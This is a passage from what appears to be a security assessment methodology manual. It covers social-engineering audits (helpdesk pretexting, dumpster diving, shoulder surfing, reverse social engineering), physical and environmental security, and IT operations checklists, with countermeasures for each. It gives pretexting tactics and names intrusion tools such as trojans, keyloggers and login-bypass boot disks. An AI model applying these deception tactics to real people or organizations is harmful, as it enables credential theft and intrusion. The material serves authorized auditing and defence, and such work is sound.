company/organisation it may have with it’s enviroment, the levels of organisation inside
the target, partners, customers, etc. are very good to know before starting a social
engineering session. Knowing more about your target enviroment can be very helpful in
establishing a good level of trust during a social engineering session.
Technical Requirements
The auditor/pen-tester must have the means to communicate with the target before
establishing a social engineering session. So the technical requirements for social
engineering are: phone, fax, email, as virtual ways of communication and also “on-thespot” access meaning, a face-to-face discussion with the target. The virtual ways of
communication are better and far less dangerous than a real face-to-face discussion with
the target, so they are the main tehnical requirement for this type of information
gathering technic.
History
Social Engineering has a big history on it’s side. It was and its still uses by hackers of all
hats everywhere. The most famous b-hat hacker that was using social engineering to
obtain sensitive information from his targets is Kevin Mitnick. In the ‘90s, he used social
engineering to get sensitive information like usernames and passwords, technical
information and even source code from many important companys and big corporations.
Objective
The main objective in using social engineering is to get sensitive information from your
target, information that can’t be obtained by regular information gathering technics.
Usernames and passwords, technical information about the hardware and software your
target uses, problems in hardware and software that can be exploited further to gain
higher levels of access on the target computer systems and more, can be very easily
obtained through social engineering sessions.
Perspective One
Page 873 of 1123
From the Security Assessor’s /Penetration Tester’s perspective, social engineering is an
easy way to get access to the target’s computer systems and exploit the levels of access
needed to reach the main objective of the assessment.
Perspective Two
From the System Administrator’s perspective, social engineering is the most difficult “to
patch” and the most dangerous vulnerability in the computer systems he needs to
maintain.
Expected Result
After using social engineering, the security auditor/pen-tester expects to have at least a
good way of access into the audited company/organisation. Either direct access, through
some usernames and passwords, or indirect access, through some information that he
can use to gain a higher level of access into the audited computer systems using regular
tools of trade.
9.1 METHODOLOGY
The audit of a company/organisation must contain a social engineering overview and all
the known issues in regarding to this.
The auditor must not reveal to any employee that he will be social engineered. Only the
right people in the company will need to be briefed about the job of the auditor.
This will resolve the problems with a rogue employee that acts from “the inside”, thus this
kind of employee will not allarmed about the auditor job in the company/organisation. As
much as it needs secrecy is required before and in during this security audit.
•
•
Employee Trainings
o
Handling Sensitive Information
o
Password Storage
o
Shoulder Surfing
o
Revealing Passwords on Phone
o
Physical Access to workstations
Helpdesk
Page 874 of 1123
o
Masquerading as a User
o
Masquerading as Monitoring Staff
•
Dumpster Diving
•
Reverse Social Engineering
Page 875 of 1123
9.2 EMPLOYEE TRAININGS
Description
Employee trainings on the Organizations IT Control Policies & Security process may be
one of the most effective methods of preventing social engineering attacks. The
auditor/tester can probe the employees and get them to reveal company sensitive
information. The auditor could also conduct off-working hour checks and try to gather
information in the form of company sensitive documents.
Objective
The employees will need to be fully briefed about the dangers of social engineering and
they must be check regularly to see if they comply with a specific internal policy about
offering sensitive information to persons inside and outside the company.
Expected Results
If the company’s/organisation’s employees understand fully the danger they can be to
the company/organisation, they will not make any mystakes and this is the main
expectation.
Process
•
Handling Sensitive Information
•
Password Storage
•
Shoulder Surfing
•
Revealing Passwords on Phone
•
Physical Access to workstations
Page 876 of 1123
9.2.1 Handling Sensitive Information
Description
Look for documents lying on the users work desk, fax machines/server, sensitive
information (e.g. passwords, Network Architecture Design written with IP addresses /
host names, on boards), These documents may reveal company sensitive data on
financials, designs, strategy’s etc. This information could be helpful in giving the users
the impression that you have authority to the information and getting them to reveal the
information you require. This may also be helpful obtaining access by getting them to
reveal their user-id and passwords.
Analysis/Conclusion/Observation
Review any policy regarding the handling of sensitive information in the audited
company/organisation.
Check for documents, papers, sticky-notes and other things that can be used to gain
access to the company’s networks for an attack. Also financial data, charts, diagrams,
lists of employees, security plans and other things that can be used successfully to pull a
social engineering session to gain more information that can be lead to the compromise
of the audited company/organisation.
Check to see one can steal any hardware that stores sensitive information. Things like
handhelds, laptops, external drives, or even internal drives from machines that aren’t
properly outside secured.
Countermeasures
Use paper shreders for any document that is no longer needed. All the papers shreds
must be kept also in a secure place until dumping so there will not be any change of
outside intruders stealing this shreds and rebuilding the original documents from them.
Also virtual information shreders must be used to securely delete any sensitive
information from the drives of the workstation and/or servers or any other computer
equipment used. This will prevent stealing of the hardware and recovery of the deleted
Page 877 of 1123
information. Also do not resell the equipment used to store sensitive information without
fully checking to see there aren’t any pieces of sensitive information about the company
still there. In the past, many cases of sold hardware containing sensitive information
about a company where used to attack the same company.
Keep all the workstations and servers on separate rooms that can only be accessed
using secure cards or even biometrics equipment. Secure all printers and also all the
hand-helds, phones and most important, all the laptops that can contain sensitive
information. Laptops and handhelds can be easily stolen and thus revealing sensitive
information about a company/organisation to a 3rd party that can use this information to
compromise the security of the company/organisation involved.
Tool[s]
Pen and paper to note all the information needed. A bag to collect all the papers and
documents regarding anything about the security and the enviroment of the target.
Remarks
This is also a good starting point from which one can conduct at a later time successful
social engineering sessions, using the information gained through weaknesses in the
handling of sensitive information in a company/organisation.
9.2.2 Password Storage
Description
Look for passwords that have been written down by users kept close to their
workstations. Passwords written down by most users are often found among a pile of
pages at their work desk or the first/last page of the writing pads. Examine all post-its
stuck at the users workplace that also might reveal this information. Look for keys behind
/under monitors which could give access to the drawers. Passwords may be written in
writing pads kept within these locked drawers.
Analysis/Conclusion/Observation
Employees shouldn’t use post-it notes sticked on to their monitor, or not write their
passwords anywhere.
Page 878 of 1123
A good password policy must be used in the company/organisation. The auditor must
test it for any weaknesses that can lead to password compromises.
Don’t keep also passwords in a file on the desktop of the workstation.
Page 879 of 1123
Countermeasures
•
Don’t write the passwords on sticky-notes on monitors and/or desks
•
A passwords policy must be adopted by the company
•
Passwords must be all changed every week and all the passwords must be at least 8
characters long, using letters, numbers and special characters. Don’t use passwords
that are easy to guess, and personal things like mother middle name, phone number,
birtdays and name of pets, favorite football team and similar choices
Tool[s]
No specific tools.
Further Reading[s]
Remarks
•
Password storage is a sensitive problem in every company/organisation.
•
Every person that uses a password in a un-secure way will expose the company to
outside attacks, so a strong policy regarding the use of passwords needs to be
adopted by every company out there.
•
Also, other ways of authentification can be used, beside using regular passwords to
authenticate with the internal networks.
Page 880 of 1123
9.2.3 Shoulder Surfing
Description
The method of obtaining the password of a user by looking at the user type the
password on the keyboard is known as shoulder surfing. This attacks is most successful
when the passwords are short & uncomplicated. To prevent shoulder surfing, experts
recommend that users should shield the keypad from view by using you’re the body to
restrict the view or cupping hand. Users in an organization should also ensure that no
person is observing them type their passwords.
Analysis/Conclusion/Observation
If given access to the premises of the offices or workstation rooms, the auditor can walk
through the offices and see if he can recognize a login session and read the username
and/or password used by a user to login into his machine or into the company’s network.
Countermeasures
Every user must ask any person in his vicinity to step back while he is logging in.
Type the user credentials with attention so it will not be required to input them several
times, thus leaving more changes for a person in the vecinity to observe the login and
password typed.
Tool[s]
No practic tools. Just a good spirit of observation is required and a good memory to
memorize all the user credentials typed.
Further Reading[s]
Remarks
This technique is usually not posible if the auditor/pen-tester doesn’t have real access to
the audited company/organisation HQ.
Page 881 of 1123
9.2.4 Revealing Passwords on Phone
Description
The easiest way to get access to information for an attacker is by asking for it. The
attacker could call the user, pretending to be an IT Helpdesk analyst. The user who
believes the call is genuine may end up revealing the user id and password.
This is basicly a social engineering session that will reveal usernames and passwords to
use in the compromise of the security of the audited company/organisation.
An attacker will get minimal access to the network, usually a regular user account and at
best, an administrator account if he could trick a administrator or tech-manager into
revealing his user credentials.
Analysis/Conclusion/Observation
If a user can and will reveal any authentification information on the phone, the company
has a big security problem. All the persons that use passwords in the company must
NOT reveal their passwords to anyone, no matter who is asking them over the phone.
Checks must be done every week inside the company/organisation to see what
employees will reveal their passwords, and if some are found, they must be drastically
sanctioned, or at best, dismissed from their jobs. They are a constant danger to the
security of the company and a person who can be easily tricked into giving any
information by phone, they can’t be trusted to handle any kind of information regarding
the company/organisation.
Countermeasures
•
Don’t give direct access to regular employees phones. Use instead an internal
answering and loggins calls system, so any calls made to the compound can be
striclty monitored for intrusions or any kind of violation of internal security policies.
•
Also the employees will not give user information or any kind of information about the
internal workings of the company/organisation. The internal users will need to report
any kind of odd bihavior they encountered over a phone conversation they had.
Page 882 of 1123
•
Internal users will need to give a pre-list with all the persons that they need to call
and will be given a list with people they can answer and talk to, trusted people inside
the company.
•
A verification of any person that would call to ask user ids and passwords will be
required, either the person is a regular employee or even a member of the internal
board.
Tool[s]
No practic tools.
Further Reading[s]
Remarks
This is the main vulnerability that can be exploited through social engineering sessions.
The more information an employee will give through a phone conversation, the higher
the danger will be to the internal security of the company/organisation.
Page 883 of 1123
9.2.5 Physical Access to workstations
Description
An attacker once given access to a workstation may easily install some Trojan code or
back door programs on the workstations. Since most of the workstations have Internet
connectivity these backdoor programs could post sensitive data including usernames &
passwords to Internet websites controlled by the attacker. The auditor must check if he is
able to access the systems because of the negligence of users who have failed to
shutdown or lock their sessions. The auditor may also explore the possibility of seizing
software or hardware containing sensitive information.
Analysis/Conclusion/Observation
Access to the workstations needs to be done after following an internal policy.
The auditor needs to verify this policy and check to see if its well implemented.
•
Every employee needs to have access to one or as many workstations as the job
description requires. The user of the workstations needs to check all the persons
who need access to the workstation/s he works on to prevent any outside
interference.
•
Every employee has to report any misconfiguration or any problem regarding direct
physical access to his workstation/s.
•
Every user must logoff or lock his curent session, every time he leaves his
workstation to do something else.
•
Every user must check the integrity of his workstation/s when he comes at work and
when he leaves work and report the status of this workstation/s. He must also sign
when he comes and when he leaves work for the workstation and for any problem
regarding his workstation/s, the user must contact the tech-department for a
verification and no one else.
If any of above is not well implemented, the company has a physical access problem to
its machines.
Countermeasures
Page 884 of 1123
•
The workstations need to be kept in a secure room, different from the servers room.
Access to this room must be done using secure ID cards.
•
The secure cards must be kept by the security officers of the company also in a
secure vault and be given to every employee only when he arrives at work and must
be taken back when the employees will leave from work.
•
The secure cards must be changed per monthly basis and all the records for the
secure logins in the workstation’s room must be verified daily and kept for at least 6
months in the company archives for further review.
•
Every machine must use a computer case that can locked to prevent outside access
to the removable drives such as CD-ROM/RW, floppy drives or USB/Firewire ports,
things that can be used to insert malicious code into the system or internal drives
that hold the OS and files.
•
Implement a network that has servers that provide services and use only disk-less
workstations or for every workstation use only remote-access to the servers for work
sessions. This way, even if an intruder has access to the workstations, without a way
to insert malicious code into the network or a way to download/copy sensitive
materials from the machine/network, he can’t do much harm as for in the case when
he has access to the entire hard drive pf the workstation and also the network.
Tool[s]
•
CD-ROMs with some OS to use them for rebooting the machines running Windows
NT/2000/XP and relogin without a password, to bypass the regular authentification, a
locked session or a passworded screensaver.
•
Passworded screensavers crackers
•
Tools like trojans with network access too, BO or SubSeven, or a custom one, also
remote keyloggers, spyware and many other malicious programs that can give
access to that machine and through it, to the entire network
•
Removable media (USB drives, floppyes, external CD-RW units, external hard
drives) can be used to clone a image of the workstation’s OS for further inspection or
just to copy sensitive information, like passwords files, accounts data, users lists and
more.
Remarks
This is an important aspect of the security of a company/organisation.
Page 885 of 1123
If an intruder can get physical access to the company’s workstations he can say he
“0wned” that company. Basicly, when a machine can be accessed by outside intruders,
that machine is no longer belonging to the company/organisation who owns it virtually. It
no longer can be trusted for access and has to be pulled from the network and it needs a
forensics analysis to see how big the security impact is for the company’s network/s.
Although this has nothing to do with a regular social engineering session, physical
access to a workstation can help in this process, to gather more information on the
company and proceed with a more successful social engineering session, that can be
more “productive” and also to gain direct access to the company’s network first hand.
Page 886 of 1123
9.3 HELPDESK
Description
An auditor can phone to the audited company and pretend to be a person from the
inside asking for help, or the auditor can create an imaginar problem, call the company
and offer his help to fix the problem, thus asking in the process usernames and
passwords or other sensitive information from administrators, managers and other
people that have access on the company/organisation network.
Objective
To aquire a user account, either a regular account or at best, and administrator account.
Expected Results
Getting
a
starting
point
to
access
the
internal
network
of
the
audited
company/organisation using a regular or high-level access account into the audited
company/organisation’s networks.
Process (Steps to complete this Process/Task/Test Case)
Page 887 of 1123
9.4 MASQUERADING AS A USER
Description
The IT Helpdesk staff that is accessible by phone can be a great source of information if
the social engineering attacks are successful. An attacker could masquerade as a
genuine user of the organization & try and obtain information. When the analyst works
under his operating guidelines the attacked may try to use high handedness by
pretending to be from the senior management. The Helpdesk analyst may be intimidated
by this & end up revealing the passwords to the attacker. These methods may be tried
by the auditor to obtain valuable information about the organization.
Analysis/Conclusion/Observation
The auditor can try to pretend to be a regular user that needs username and password
to work remotely, or a member of the senior staff, tech-support or other high ranking
officer that needs high level access to the network to do remote work. If the auditor will
succeed then he will have direct access to the company networks and thus
compromising the security of the audited company/organisation.
Countermeasures
New users or users that need urgent access and they forgot the usernames and
passwords needed to work remote, must be properly check for their identity before
releasing them usernames and passwords. They must be monitored while they work
remotely and when they will be available in the company premises, they must be rechecked and re-issued with new usernames and passwords to use, and the old ones will
be deleted.
In order to avoid such type of attacks the operating guidelines for the IT Helpdesk Staff
must be well defined. The staff must be able to authenticate the user through various
methods. Either through calling the person on his cell-phone number maintained in a
company directory list, or by sending him the information requested in a mail to his mailid.
Tool[s]
Page 888 of 1123
No specific tool needed.
Remarks
If an auditor can successfully pretend to be a “lost” user that needs basic authetification
information to login to the network, he will get usually a username and password, a goos
starting point into accessing the internal network of the company/organisation and from
here, he can exploit internal problems in the network to gain higher levels of access, thus
compromising the entire network.
Page 889 of 1123
9.4.1 Masquerading as Monitoring Staff
Description
The attacker in some cases may choose to masquerade as a staff that is monitoring the
networks that the IT Helpdesk Staff maintains. The attacker may call the Helpdesk
Manager and get him/her to believe that there are some problems with their systems and
try obtaining information of the helpdesk staff themselves. This attack in particular has
been very popular in larger organizations. The auditor examining the vulnerability of
organizations to Social Engineering attacks should try these same methods.
Analysis/Conclusion/Observation
Call the helpdesk staff and report a misconfiguration or a problem that needs to be
solved imediately. This kind of problems are urgent and need to be fixed imediately, so
the helpdesk manager will not have time to check the person on the phone, the auditor,
to see if he is the person who pretends to be.
Try to come up with a realistic scenario of a problem that can happen in the audited
company and try to call someone from the tech-department and report the problem.
Offer to help dealing with the problem on the phone and ask the tech-person more and
more information about the network and things like this. If he auditor can social engineer
a tech-person, he will have access to almost anything from the company through that
person. Gaining trust of a tech-person is harder on the first, but then gained, that person
will be the most helpful into giving out sensitive information that can lead to a
compromise in the security of the audited company/organisation.
Countermeasures
Every helpdesk manager must ask for user credentials from the person calling, and after
doing a check to see the person is really who he says he his then will disclose the
needed information.
A good set of questions about the company enviroment, asking things that aren’t printed
or documented anywhere and only a member of the real staff will know them, is a good
starting point for a check out.
If the person on the other lines will hang up after not knowing the answer to some
specific question, the helpdesk manager will need to notice that he/she was contacted
Page 890 of 1123
by an outside person that tried to social engineer them into giving sensitive information
about the insides of the company/organisation.
Tool[s]
No specific tools.
Further Reading[s]
Remarks
This is not an easy social engineering tactic. The auditor must be very good with social
engineering
to
try
to
get
information
from
the
technical
staff
from
a
company/organisation. The people working in the tech department are usually smarter
than regular employees and they will easily spot a try to social engineer them into giving
out sensitive information. A very good knowing of the enviroment of the audited
company/organisation is required for this tactic.
Page 891 of 1123
9.5 DUMPSTER DIVING
Description
Dumbster diving it’s another step in the process of gathering information on the target.
Objective
To obtain posibly sensitive information about the target. Things like employees records,
guard shifts, charts/diagrams, other kind of internal company/organisation papers, even
lists with usernames and passwords, can be very usefull for a social engineering session
later.
Expected Results
Results are good when some information was obtained to help further gaining access
using social engineering sessions or direct access, if a list of usernames and passwords
was found.
Process
Dumpster Diving
Description
Dumpster diving or trashing as the name suggest means looking for valuable information
discarded by the organization in the form of trash. The data trashed may include
company phone directories, organization charts, IT policies & manuals. This might reveal
vital information to attackers about the possible identities the hacker can try
impersonating. System manuals may give the attacker an insight into the IT environment
(including technology & processes) being used that in turn can be used to plan for an
attack. Corporate directories & vacation plans are often not viewed by organizations as
sensitive information, hence these pages may be trashed which can be misused by the
attackers.
An auditor should examine the classification levels for all sort of information that is
generated & processed in an organization. Employee personal information must be
Page 892 of 1123
categorized by the company as sensitive & if this data has to be discarded then the
pages must be shredded & then trashed.
Analysis/Conclusion/Observation
Dumpster diving is not a clean job an auditor will do, but a persistent attacker can use
this technique to acquire information which can later be used to compromise the security
of a company/organization.
This technique is old fashioned and can easily countered by locking the
company/organization dumpsters and/or even surveillance them to see who is searching
in them for anything.
Countermeasures
•
Lock the company/organization dumpsters with good locks.
•
Put a spot light on the premises of the dumpsters so the dumpster zone can be well
seen even at night.
•
Use paper shredders in the company’s/organization’s offices, so that any source of
sensitive information thrown away will be hard to use by a potential intruders looking
for information in the company dumpsters.
Tool[s]
A bag to hold the materials gathered, a flashlight, a small disguise even. Fake glasses,
may be a weg.
Remarks
A “messy” job for an auditor, but a necessary one if the information gathered this way will
be valuable to further increase the level of access in the audited company/organisation
Page 893 of 1123
9.6 REVERSE SOCIAL ENGINEERING
Description
This type of attack is one of the difficult types of social engineering attacks where the
attacker creates an individual in authority. Once this is successful, the attacker will call
the victims and generally offer their help into an imaginary problem. This is a unique type
of attack where the information can be stolen without the victims knowing that their
information may have been compromised. E.g. an attacker could cause a breakdown in
the victim’s network and then pretend to be a consultant who could solve the problem. In
doing so, the attacker could steal significant information from the victim network without
the victim’s knowledge.
It is difficult to set guidelines for the auditor to carry out such type of tests and the auditor
may have to use his/her imagination and knowledge about the organizations processes
to carry out such tests.
There are no direct controls that one can implement in this type of attacks and it’s the
combined security processes of the organization including and note restricted to physical
security/ helpdesk procedures/ vendor outsourcing policies that will act as a deterrent to
reverse social engineering attacks.
Analysis/Conclusion/Observation
Reverse social engineering is the most effective type of social engineering. The victims
will not even know they were missleaded into giving sensitive information to an outsider.
Also this attack is also the hardest one to detect and prevent.
Countermeasures
The need to have good policies regarding any urgent situations that can happen and the
persons in charge of dealing with any urgent issues regarding anything related to
security in the company/organisation.
Also a good understanding from all the employees of this danger, and the things they
must know to prevent this type of attack are needed.
Page 894 of 1123
Tool[s]
No
specific
tools
needed,
but
a
very
good
knowledge
of
the
audited
company’s/organisation’s enviroment, very good people skills, and basicly a good and
as much real as posible plan to implement.
Remarks
Reverse social engineering is not an easy type of social engineering technique. Only
experienced auditors that have done many social engineering sessions and successfully
exploited the levels of trust in a company will be able to use this way of getting sensitive
information about the audited company/organization.
Page 895 of 1123
9.7 GLOBAL COUNTERMEASURES
•
Social engineering is a big issue for any company. The security of the
company/organization can be easily compromised using social engineering sessions.
•
The people are the weakest link in the security chain of any company/organization. If
one, auditor, attacker, other, knows how to exploit the people, the employees of the
specific company/organization they target, that one will have a very big advantage
and can possibly get any information he needs to further compromise the target.
•
Every company must have internal policies regarding this type of attack. The
employees must be aware of this type of attacks, they must be internally trained so
they can spot and not fall victims to this types of attacks.
•
Also every company must keep all its sensitive information in a secure place. Every
company must have strict internal rules regarding the misuse of company
information. All the persons that can be easily mis-leaded into giving any type of
information that can lead to a security compromise must not be trusted to handle
sensitive information in the company.
•
Any high-ranking employee must know how to protect himself in front of this kind of
attacks. Because attackers often target persons with high-level access in the
company, senior-employees must keep any information they can leak, securely at all
times.
•
To prevent social engineering attacks, a company/organisation must know how to
keep all it’s information securely, and to prevent social engineering attacks, all the
factors that lead to a successful social engineering attack must be countered.
•
In the end, a good information and a good knowledge of these techniques is most
important to detect, counter and prevent any social engineering attacks and all the
ways they posses a danger to the security of any company/organisation.
Page 896 of 1123
9.8 FURTHER READING[S]
“The Art of Deception” – Mitnick, Kevin & Simon, William L.
Page 897 of 1123
10PHYSICAL SECURITY ASSESSMENT
Description
Proper Physical & Environmental Security ensures that access to systems hardware &
other elements vital for systems functioning like the electric power service, the air
conditioning and heating plant, telephone and data lines, backup media and source
documents is controlled. This also ensures maintaining the proper environment for
optimal systems performance through cooling & humidification.
Objective
[Text]
Write objective of this document not purpose of device (e.g. Router, Firewall, IDS)
Requirement
[Text]
•
Understand Organization’s environment
•
Technical Requirements
Expected Result
10.1 METHODOLOGY
•
Review of Access Control System
•
Fire Protection
•
Environmental Control
•
Interception of Data
10.2 REVIEW OF ACCESS CONTROL SYSTEM
Description
Objective
Page 898 of 1123
Expected Results
Pre-requisites
Process
•
Barriers
•
Guards
•
PACS
•
CCTV Monitoring
•
Employee Training
10.2.1
Barriers
Review if there are adequate barriers in and around the facility to restrict the
uncontrolled movement of personnel & data. Barriers could be in the form of walls,
partitions, perimeter fences etc.
10.2.2
Guards
Review if the security guards challenge the entry of personnel to sensitized areas.
10.2.3
PACS
Is there a Physical Access Control System deployed which can control the access of
personnel to sensitized areas. The PACS can be proximity card/magnetic card based or
even based on biometrics (fingerprint identification). The PACS system should ideally be
centralized & personnel should be granted access to the areas they require only on
adequate approvals from their managers. The logs of all PACS should be monitored for
violations. Anomalous activities should be recorded, investigated & if necessary be
escalated to the concerned authority
10.2.4
CCTV Monitoring
CCTV (Closed Circuit Television Monitoring) can be used to monitor all entries & exits of
sensitized areas from a single location. All entries/exits should preferably include even
emergency exits that can be source for unauthorized entries. There could be dedicated
Page 899 of 1123
personnel monitoring the CCTV system who can raise an alert on suspicious activities.
There are cameras, which work on motion sensors that track movement in its coverage
area. When there is movement the screen at the monitoring end is updated. The tapes
or video must be preserved for long durations to track historical events.
10.2.5
Employee Training
All employees must be trained on the physical security aspects & they should challenge
visitors accessing sensitized areas without proper authorization & escort.
Page 900 of 1123
10.3 FIRE PROTECTION
Fire detection equipment is required for quickly detecting a fire & extinguishing it. It is
also important to accurately pinpoint the location of the fire.
Process
•
Fire Detection Systems
•
Fire Suppression Equipment
•
Fire Extinguishers
10.3.1
Fire Detection Systems
Smoke Detector & Heat sensors should be used for detecting the presence of a fire &
these in turn should be connected to a centralized alarm system. Smoke detectors &
Heat sensors detect the fire at a nascent stage which is very helpful in suppressing the
fire. The alarm system would help pinpoint the area of the fire so that adequate action
can be taken to suppress the fire. The fire alarms should be located at a place that is
attended by personnel round the clock. Employees must also be trained to respond to
the fire alarms & evacuate when necessary.
10.3.2
Fire Suppression Equipment
Various type of fire suppression equipment like GAS/ Water Based systems are
available which should be deployed. Among the GAS based suppression systems we
have the FM-200 (HFC-227ea)_ CEA-410 or CEA 308_ NAF-S-III (HCFC Blend A)_ FE13 (HCFC-23)_ Aragon (IG55) or Argonite (IG01)_ Inergen (IG541) as replacements for
Halon based suppression systems. The Water based suppression systems could be a
‘dry pipe’ or ‘closed head system’ which use water sprinklers to suppress fires. The
water-based systems are generally not very suitable where there is a presence of
expensive electronics computer equipment like server rooms. The suppression systems
could be directly integrated with the alarm systems so that they are energized the
moment a fire is detected.
Page 901 of 1123
10.3.3
Fire Extinguishers
Portable extinguishers (Powder based/ CO2 based) must be placed at easily accessible
points which can be used in cases of fire emergencies. These extinguishers must be
regularly serviced & the pressure levels of the extinguishing medium must be checked.
Employees must also be trained for the use of fire extinguishers.
10.4 ENVIRONMENTAL CONTROL
HVAC: Heating Ventilation & Air Conditioning or in short maintaining the environment is
very important from a systems availability perspective.
Process (Steps to complete this Process/Task/Test Case)
•
Air Conditioning & Humidity Control
•
Water Detection
•
Ups & Power Conditioning
•
Interference
10.4.1
Air Conditioning & Humidity Control
There must be a centralized system which controls the air temperature through the use
of thermostats. Air temperature can be maintained between 22-24 Degrees Celsius in
normal working areas & 15-23 Degrees Celsius in Computer/Server rooms. Humidity
should be maintained at 40 -60%. This is important for optimal functioning of the
equipment as higher or lower temperatures may damage the electronic circuits. Similarly
if the humidity level drops the dryness in the atmosphere may generate static charges
that could permanently damage electronic circuits. The Temperature & Humidity should
be controlled by an integrated alarm system that is continuously monitored.
10.4.2
Water Detection
Plumbing leaks can cause flooding of equipment rooms. Utmost care must be taken to
isolate the plumbing system from the areas where the data centers are present.
Optionally a water detection system may be installed under the false flooring of a data
center that would enable detection of water before it encroaches the floor of the data
center & adequate action can be taken to stop the water flow.
Page 902 of 1123
10.4.3
Ups & Power Conditioning
UPS & Power conditioning: Electrical surges, spikes are among the most frequent
reasons for critical equipment failure. Surge suppression equipments must be deployed
which can effectively condition the power to the required levels & frequencies. UPS or
Uninterruptible power supplies must be used to ensure continuous supply of power to
critical equipment. Electric power from multiple service providers may be used so that
there is no dependency on a single provider. If there are prolonged power cuts, backup
generator sets should be used to supply continuous power to the systems.
10.4.4
Interference:
Interference
EMI
(electro-magnetic
interference)
can
severely
hamper
the
communications. If high voltage power cable are running very close to the network
communication cable the interference generated from the power cable can cause errors
in the data communication resulting in degraded performance.
COUNTERMEASURES
Contributors
Links
Page 903 of 1123
10.5 INTERCEPTION OF DATA
Depending on the type of data a system processes, there may be a significant risk if the
data is intercepted. There are three routes of data interception: direct observation,
interception of data transmission, and electromagnetic interception.
Objective
Expected Results
Pre-requisites
Process
•
Data Observation
•
Interception of Data
•
Electromagnetic Interception
10.5.1
Data Observation
Critical computer systems that display sensitive information on the screens must be kept
in sensitized areas. Their displays must not be visible to attackers outside the sensitized
area .e.g if a computer system on which significant merger related information is being
processed is located near the window; then this data may be available to spies just
across the street that can look at the screen.
10.5.2
Interception of Data
Interception of Data: Data passing through communication networks may be tapped. If
there are common ducts used by various organizations in a single building which
unsecured, attackers are pretending to be tenants who are using the same duct could
tap into the cables & be able to access vital information passing in & out of the
organization. Therefore cables require to be properly secured while passing through
common ducts.
Page 904 of 1123
10.5.3
Electromagnetic Interception
Electromagnetic Interception: Computers while processing information emanate
electromagnetic radiation. An attacker using an antenna & a receiver can monitor and
retrieve classified or sensitive information as it is being processed without the user being
aware that a loss is occurring. These sorts of data interception methods are also know
as TEMPEST.
These attack methods are very complex & the organization should
consider
financial
the
implications
before
implementing
TEMPEST
shielding
mechanisms which block electromagnetic radiation.
10.6 GLOBAL COUNTERMEASURES
10.7 FURTHER READINGS
Page 905 of 1123
11ENTERPRISE SECURITY OPERATIONS MANAGEMENT
The implementation of a comprehensive Information Security management framework
includes both technical and manual security processes that need to be synchronous to
each other to ensure completeness of the management of security. Operations
Management includes the management of the IT administration and service delivery
processes of the enterprise. A review of the IT operations in any security framework
assessment is essential to ensure that security operational processes that support the
information security management of the enterprise are appropriately implemented and
adhered to in order to ensure that such controls and security measure are effectively
meeting the enterprise’s information risk management objectives.
11.1.1
Capacity Management
Capacity Management relates to the process of management of the IT infrastructure
capacity to ensure continuous availability of the technology infrastructure of the
enterprise. This would typically involve the management of the capacity of hardware and
software components to ensure that there is no disruption to the activities of the
business caused by any technological capacity restrictions. Such activities would
include:
•
Review and ensure that appropriate processes exist for planning and acquiring new
systems, systems upgrades or new versions of systems considering the capacity
requirements of the enterprise
•
Assess whether capacity usage is constantly monitored in order to ensure availability
of IT services and to detect any unauthorized activities in the IT environment. This is
particularly important considering the risks of DoS attacks or similar other attacks
being executed against the enterprises infrastructure.
•
Ensure that capacity monitoring and planning considers all the components of the
technology infrastructure of the enterprise such as hardware, software and
networking.
Domain
Introduction
Capacity Management
Capacity management ensures that IT resources are used in an efficient manner with regard
to availability. It ensures appropriate disk quota, response times, processing and network
and system capacity.
Prerequisite
Statistical reports from capacity utilisation trend monitoring processes
Stress testing report on systems, applications and on network components
Volume capacity document
Tools for stress, volume and capacity testing
Objective
To identify gaps in minimum baseline standard
To assess capacity of systems, applications and network components
Evaluation Check
1
Yes
No
N/A
Evaluation Performed and
Results
Is there any policy and processes for
capacity management? If so is that
available for review?
Page 906 of 1123
2
Is the policy and processes for capacity
management ensures that the minimal
standards stated in the service level
agreements are fulfilled?
3
Is the capacity management process covers
all critical components?
4
Is the organization predicted resource
bottlenecks related to business needs?
5
Is the capacity and availability plans
established based on service level
agreements?
6
Is there any process to test new software on
performance and capacity before
implementing them?
11.1.2
Vulnerability Management
Vulnerability Management relates to the process of management of vulnerabilities of
various applications, databases and systems software in use within an enterprise. The
need for a structured and managed Vulnerability Management process stems from the
technology infrastructure implemented within an enterprise and security or control lapses
inherent within such software. The process of vulnerability management would involve
the identification, monitoring and patch management of vulnerabilities of the specific
technologies in use. The typical activities of the
11.1.3
Release Management
Release Management comprises of management of changes to the information
technology environment of the enterprise. This would include the management of
changes in respect of the following:
11.1.3.1
•
•
•
•
PATCH MANAGEMENT
Patches are obtained from authorized sources only
Patches are appropriately tested in a test environment prior to application to the
production environment
Patches are applied only on need basis and not solely due to a release by the
vendor
Patches are adequately monitored
Introduction
Patch Management
Patch management covers the tools/utilities, policies and processes for keeping systems
latest with new software updates which are released after software is developed. Pro-active
security patch management is essential to keep enterprise environment secure and reliable.
A patch management process covers configuration changes, applying software updates and
provides recommendations to safeguard.
Page 907 of 1123
Prerequisite
Documents related to identifying new patches, vulnerabilities, patch testing and patch
implementation.
Objective
To evaluate patch management process for an enterprise.
Evaluation Check
1
Does the organization have explicit and
documented policy and processes for
handling patches?
2
Is the patching policy and process specifies
what techniques an organization will use to
monitor for new patches and vulnerabilities
and who will be responsible for monitoring
them?
Is the organization has a methodology for
testing and secure implementation of
patches?
Does the patch management process
define what patches will be implemented
first and on which all systems?
3
4
5
Yes
No
N/A
Evaluation Performed and
Results
Is the methodology for handling patches
includes?
All necessary Inventories in the organization
Vulnerability and patch monitoring?
Patch prioritization techniques
Patch testing
Patch management training
Automatic patch implementation
11.1.3.2
CONFIGURATION MANAGEMENT
Configuration management relates to the process of management of
•
The configurations of all hardware devices/components,
•
operating systems and application software, firmware components, physical and
logical network addresses and connecting circuit numbers of Internet connectivity
and the network architecture should be adequately documented and maintained.
11.1.3.3
Domain
Introduction
CHANGE MANAGEMENT
Change Management
Change management process ensures that the integrity in the production environment is
maintained. It ensures that authorized and adequately tested programs are migrated into the
production environment.
Prerequisite
Page 908 of 1123
Objective
Evaluation Check
1
Is there a formal technical change
management procedure in place? And if so
is that available for review?
2
Is all the changes aligned with company’s
standard configuration management
procedure?
3
Is all the emergency changes embedded in
centralise technical change management
process?
Is the production environment separate
from development and staging
environment?
4
5
Is personal formally submitting and
implementing changes?
6
Is segregation of duties been followed by
users and also by staff responsible for
making changes into production
environment?
11.1.4
Yes
No
N/A
Evaluation Performed and
Results
Enterprise Incident Management
Enterprise Incident Management relates to the identification, investigation and resolution
of security incidents related to the Information Systems Infrastructure of an enterprise.
The philosophy of incident management requires that all incidents irrespective of their
criticality are logged and investigated to ensure that they do not pose a security
concern/risk to the enterprise. A review of the Enterprise Incident Management
Processes includes:
•
Ensure that the enterprise has adequate infrastructure and processes to identify and
record all systems events
